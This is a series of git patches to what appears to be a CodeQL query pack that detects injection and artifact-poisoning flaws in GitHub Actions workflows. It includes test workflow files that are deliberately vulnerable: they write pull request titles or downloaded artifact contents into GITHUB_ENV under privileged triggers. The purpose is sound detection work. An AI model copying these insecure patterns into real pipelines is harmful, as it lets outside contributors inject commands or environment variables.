["zitadel/zitadel/.github/workflows/release.yml", "*", "inputs.build_image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/container.yml", "*", "inputs.build_image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file From 6c245605a754d5a43dafa11c4448b30a642e0d17 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Thu, 11 Apr 2024 11:26:45 +0200 Subject: [PATCH 0165/1267] Discard already-modeled sinks --- ql/src/Security/CWE-020/CompositeActionsSinks.ql | 4 +++- ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql | 4 +++- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 54f58e6b63e..3ea9050c832 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -21,7 +21,9 @@ private module MyConfig implements DataFlow::ConfigSig { exists(CompositeAction c | c.getAnInput() = source.asExpr()) } - predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } + predicate isSink(DataFlow::Node sink) { + sink instanceof CodeInjectionSink and not externallyDefinedSink(sink, "code-injection") + } } module MyFlow = TaintTracking::Global; diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index 2dd5bf1cfef..5f1c54e7003 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -21,7 +21,9 @@ private module MyConfig implements DataFlow::ConfigSig { exists(ReusableWorkflow w | w.getAnInput() = source.asExpr()) } - predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } + predicate isSink(DataFlow::Node sink) { + sink instanceof CodeInjectionSink and not externallyDefinedSink(sink, "code-injection") + } } module MyFlow = TaintTracking::Global; From 1b2e02df64938e6edca0b98b0d34f86d094e4ab9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Apr 2024 15:18:09 +0200 Subject: [PATCH 0166/1267] Add support for multiline assigments --- ql/lib/codeql/actions/Ast.qll | 66 +++++++++++++++---- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 33 +++++++--- .../security/ArtifactPoisoningQuery.qll | 2 +- .../actions/security/EnvVarInjectionQuery.qll | 58 +++++++++------- .../.github/workflows/multiline.yml | 29 ++++++++ ql/test/library-tests/test.ql | 4 +- .../CWE-077/.github/workflows/test4.yml | 43 ++++++++++++ .../Security/CWE-077/EnvVarInjection.expected | 6 ++ .../PrivilegedEnvVarInjection.expected | 8 +++ .../Security/CWE-094/CodeInjection.expected | 4 +- .../CWE-094/PrivilegedCodeInjection.expected | 8 +-- .../.github/workflows/artifactpoisoning51.yml | 4 -- .../.github/workflows/artifactpoisoning52.yml | 27 ++++++++ .../.github/workflows/artifactpoisoning53.yml | 27 ++++++++ .../CWE-829/ArtifactPoisoning.expected | 2 + 15 files changed, 265 insertions(+), 56 deletions(-) create mode 100644 ql/test/library-tests/.github/workflows/multiline.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index bbf5c86fb95..cf5b63399f0 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -25,14 +25,17 @@ module Utils { } bindingset[line, var] - predicate extractAssignment(string line, string var, string key, string value) { + private predicate extractLineAssignment(string line, string var, string key, string value) { exists(string assignment | + // single line assignment assignment = - line.regexpCapture("(echo|Write-Output)\\s+(.*)\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + "(\\})?(\"|')?", 2) and + count(assignment.splitAt("=")) = 2 and key = trimQuotes(assignment.splitAt("=", 0)) and value = trimQuotes(assignment.splitAt("=", 1)) or + // workflow command assignment assignment = line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::set-" + var.toLowerCase() + "\\s+name=(.*)(\"|')?", 3).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") and @@ -41,20 +44,59 @@ module Utils { ) } - predicate writeToGitHubEnv(Run run, string key, string value) { - exists(string script, string line | - script = run.getScript() and - line = script.splitAt("\n") and - Utils::extractAssignment(line, "ENV", key, value) + bindingset[var] + private string multilineAssignmentRegex(string var) { + result = + ".*(echo|Write-Output)\\s+(.*)<<\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + var.toUpperCase() + "(\\})?(\"|')?.*" + } + + bindingset[var] + private string multilineBlockAssignmentRegex(string var) { + result = + ".*\\{(\\s|::NEW_LINE::)*(echo|Write-Output)\\s+(.*)<<\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?(\\s|::NEW_LINE::)*\\}\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + var.toUpperCase() + "(\\})?(\"|')?.*" + } + + bindingset[script, var] + private predicate extractMultilineAssignment(string script, string var, string key, string value) { + // multiline assignment + exists(string flattenedScript | + flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and + value = + "$(" + + trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 4)) + .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + + "(\\})?(\"|')?", "") + .replaceAll("::NEW_LINE::", "\n") + .trim() + .splitAt("\n") + ")" and + key = trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 2)) + ) + or + // multiline block assignment + exists(string flattenedScript | + flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and + value = + "$(" + + trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 5)) + .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + + "(\\})?(\"|')?", "") + .replaceAll("::NEW_LINE::", "\n") + .trim() + .splitAt("\n") + ")" and + key = trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 3)) ) } + predicate writeToGitHubEnv(Run run, string key, string value) { + extractLineAssignment(run.getScript().splitAt("\n"), "ENV", key, value) or + extractMultilineAssignment(run.getScript(), "ENV", key, value) + } + predicate writeToGitHubOutput(Run run, string key, string value) { - exists(string script, string line | - script = run.getScript() and - line = script.splitAt("\n") and - Utils::extractAssignment(line, "OUTPUT", key, value) - ) + extractLineAssignment(run.getScript().splitAt("\n"), "OUTPUT", key, value) or + extractMultilineAssignment(run.getScript(), "OUTPUT", key, value) } } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index e66c8e7c1b9..48c40b6a72c 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -36,19 +36,36 @@ class AdditionalTaintStep extends Unit { * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" */ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string varName, string output | - c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and + exists(Run run, string varName, string key, string value | + c = any(DataFlow::FieldContent ct | ct.getName() = key.replaceAll("output\\.", "")) and run.getInScopeEnvVarExpr(varName) = pred.asExpr() and - exists(string script, string line | - script = run.getScript() and - line = script.splitAt("\n") and - Utils::extractAssignment(line, "OUTPUT", output, _) and - line.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 - ) and + Utils::writeToGitHubOutput(run, key, value) and + value.matches("%$" + ["", "{", "ENV{"] + varName + "%") and succ.asExpr() = run ) } +/** + * Holds if a Run step declares an environment variable, uses it in its script to set another env var. + * e.g. + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "foo=$(echo $BODY)" >> $GITHUB_ENV + */ +predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run, string varName, string value | + run.getInScopeEnvVarExpr(varName) = pred.asExpr() and + Utils::writeToGitHubEnv(run, _, value) and + value.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 and + succ.asExpr() = run + ) +} + +class EnvToRunTaintStep extends AdditionalTaintStep { + override predicate step(DataFlow::Node node1, DataFlow::Node node2) { envToRunStep(node1, node2) } +} + /** * A downloaded artifact that gets assigned to a Run step output. * - uses: actions/download-artifact@v2 diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index c192974a12b..4a334f3440f 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -250,7 +250,7 @@ class EnvVarInjectionRunStep extends PoisonableStep, Run { // eg: `echo "sha=$(> $GITHUB_ENV` Utils::writeToGitHubEnv(this, _, value) and // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + value.regexpMatch(["\\$\\(", "`"] + ["ls\\s+", "cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) } } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index d216707ec86..edeea61a871 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -5,35 +5,47 @@ import codeql.actions.dataflow.FlowSources private import codeql.actions.security.ArtifactPoisoningQuery import codeql.actions.DataFlow -class EnvVarInjectionFromExprSink extends DataFlow::Node { - EnvVarInjectionFromExprSink() { - exists(Expression expr, Run run, string script, string line, string key, string value | - script = run.getScript() and - line = script.splitAt("\n") and - Utils::extractAssignment(line, "ENV", key, value) and - expr = this.asExpr() and - run.getAnScriptExpr() = expr and - value.indexOf(expr.getRawExpression()) > 0 - ) - } +predicate envVarInjectionFromExprSink(DataFlow::Node sink) { + exists(Expression expr, Run run, string key, string value | + Utils::writeToGitHubEnv(run, key, value) and + expr = sink.asExpr() and + run.getAnScriptExpr() = expr and + value.indexOf(expr.getRawExpression()) > 0 + ) } -class EnvVarInjectionFromFileSink extends DataFlow::Node { - EnvVarInjectionFromFileSink() { - exists(Run run, ArtifactDownloadStep step, string value | - this.asExpr() = run and - step.getAFollowingStep() = run and - Utils::writeToGitHubEnv(run, _, value) and - // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) - ) - } +predicate envVarInjectionFromFileSink(DataFlow::Node sink) { + exists(Run run, ArtifactDownloadStep step, string value | + sink.asExpr() = run and + step.getAFollowingStep() = run and + Utils::writeToGitHubEnv(run, _, value) and + // TODO: add support for other commands like `<`, `jq`, ... + value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + ) +} + +/** + * Holds if a Run step declares an environment variable, uses it to declare a new env var. + * e.g. + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "foo=$(echo $BODY)" >> $GITHUB_ENV + */ +predicate envVarInjectionFromEnvSink(DataFlow::Node sink) { + exists(Run run, Expression expr, string varName, string value | + sink.asExpr().getInScopeEnvVarExpr(varName) = expr and + run = sink.asExpr() and + Utils::writeToGitHubEnv(run, _, value) and + value.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 + ) } private class EnvVarInjectionSink extends DataFlow::Node { EnvVarInjectionSink() { - this instanceof EnvVarInjectionFromExprSink or - this instanceof EnvVarInjectionFromFileSink or + envVarInjectionFromExprSink(this) or + envVarInjectionFromFileSink(this) or + envVarInjectionFromEnvSink(this) or externallyDefinedSink(this, "envvar-injection") } } diff --git a/ql/test/library-tests/.github/workflows/multiline.yml b/ql/test/library-tests/.github/workflows/multiline.yml new file mode 100644 index 00000000000..04468cb15a1 --- /dev/null +++ b/ql/test/library-tests/.github/workflows/multiline.yml @@ -0,0 +1,29 @@ +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Test: + runs-on: ubuntu-latest + steps: + run: | + echo "changelog<> $GITHUB_OUTPUT + echo -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT + echo "CHANGELOGEOF" >> $GITHUB_OUTPUT + run: | + EOF=$(dd if=/dev/urandom bs=15 count=1 status=none | base64) + echo "status<<$EOF" >> $GITHUB_OUTPUT + echo "$(cat status.output.json)" >> $GITHUB_OUTPUT + echo "$EOF" >> $GITHUB_OUTPUT + run: | + echo "response<<$EOF" >> $GITHUB_OUTPUT + echo $output >> $GITHUB_OUTPUT + echo "$EOF" >> $GITHUB_OUTPUT + - run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 947757c8c3a..fa6c430e366 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -80,7 +80,7 @@ query predicate writeToGitHubEnv(string key, string value) { "echo 'sha2=$(> $GITHUB_ENV", "echo sha3=$(> $GITHUB_ENV", ] and - Utils::extractAssignment(t, "ENV", key, value) + Utils::extractLineAssignment(t, "ENV", key, value) ) } @@ -98,6 +98,6 @@ query predicate writeToGitHubOutput(string key, string value) { "echo sha5=$(> ${GITHUB_OUTPUT}", "echo sha6=$(> \"${GITHUB_OUTPUT}\"", ] and - Utils::extractAssignment(t, "OUTPUT", key, value) + Utils::extractLineAssignment(t, "OUTPUT", key, value) ) } diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml new file mode 100644 index 00000000000..7fb89591b11 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml @@ -0,0 +1,43 @@ +name: Pull Request Open + +on: + pull_request_target: + branches: + - main + - 14.0.x + + types: + - opened + - reopened + +jobs: + updateJira: + if: github.actor != 'dependabot[bot]' + runs-on: ubuntu-latest + steps: + - name: Checkout repository + uses: actions/checkout@v4 + + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + echo "PR_TITLE<> $GITHUB_ENV + echo "$TITLE" >> $GITHUB_ENV + echo "EOF" >> $GITHUB_ENV + - run: | + echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" + ls | grep -E "*.(tar.gz|zip)$" >> "${GITHUB_ENV}" + ls | grep -E "*.(txt|md)$" >> "${GITHUB_ENV}" + echo "EOF" >> "${GITHUB_ENV}" + - run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + + diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index 0c4574a77cb..32379a7264f 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected @@ -3,6 +3,8 @@ edges | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | +| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | +| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | nodes | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | @@ -12,5 +14,9 @@ nodes | .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:21:9:25:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:25:9:31:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index 6dbe7bf3c93..77db4c10344 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected @@ -3,6 +3,8 @@ edges | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | +| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | +| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | nodes | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | @@ -12,6 +14,10 @@ nodes | .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:21:9:25:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:25:9:31:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Run Step | @@ -19,3 +25,5 @@ subpaths | .github/workflows/test2.yml:47:9:52:6 | Run Step | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:47:9:52:6 | Run Step | Run Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | +| .github/workflows/test4.yml:21:9:25:6 | Run Step | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:21:9:25:6 | Run Step | Run Step | +| .github/workflows/test4.yml:25:9:31:6 | Run Step | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:25:9:31:6 | Run Step | Run Step | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index a300f4dd11e..bf515674d90 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -200,8 +200,8 @@ nodes | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index f025d13b1a9..6ba7a1c714a 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -200,8 +200,8 @@ nodes | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | @@ -309,8 +309,8 @@ subpaths | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | -| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml index ca074428ccf..71f590fbc9c 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml @@ -18,7 +18,3 @@ jobs: - name: Env Var Injection run: | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV - - - - diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml new file mode 100644 index 00000000000..130668b8515 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml @@ -0,0 +1,27 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - name: Env Var Injection + run: | + echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" + ls | grep -E "*.(tar.gz|zip)$" >> "${GITHUB_ENV}" + ls | grep -E "*.(txt|md)$" >> "${GITHUB_ENV}" + echo "EOF" >> "${GITHUB_ENV}" + + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml new file mode 100644 index 00000000000..7c255e7722d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml @@ -0,0 +1,27 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + + + + diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected index 